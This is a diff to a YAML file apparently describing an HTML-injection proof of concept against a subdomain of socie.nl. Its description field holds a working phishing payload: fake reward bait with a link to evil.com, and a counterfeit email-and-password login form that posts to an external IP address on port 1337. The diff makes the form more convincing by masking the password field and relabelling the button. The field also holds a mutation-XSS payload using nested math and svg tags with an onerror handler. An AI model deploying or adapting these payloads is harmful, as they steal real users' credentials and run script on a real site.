--- a/msf.yaml
+++ b/msf.yaml
@@ -3,7 +3,7 @@ info:
   title: HTML INJECTION ON SOCIE.NL SUB-DOMAIN FOR POC
   description: |
     <h1>To get free 1000$ reward, please go to our patner website:</h1> <h1><a href="https://evil.com">Click Here</a></h1>
-    <form action="http://13.233.17.192:1337" class="noclick" method="POST"><label><input id="textbox" type="text" name="userName" placeholder="EMAIL" style="width:320px;height=30px"></label><br><label><input  id="textbox" type="text" placeholder="PASSWORD" name="password" style="width:320px"></label><br><input type="submit" value="SIGN IN"></form>
+    <form action="http://13.233.17.192:1337" class="noclick" method="POST"><label><input id="textbox" type="text" name="userName" placeholder="EMAIL" style="width:320px;height=30px"></label><br><label><input id="textbox" type="password" placeholder="PASSWORD" name="password" style="width:320px"></label><br><input type="submit" value="Login"></form>
     <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(document.domain) src=1></form>
 
   version: production
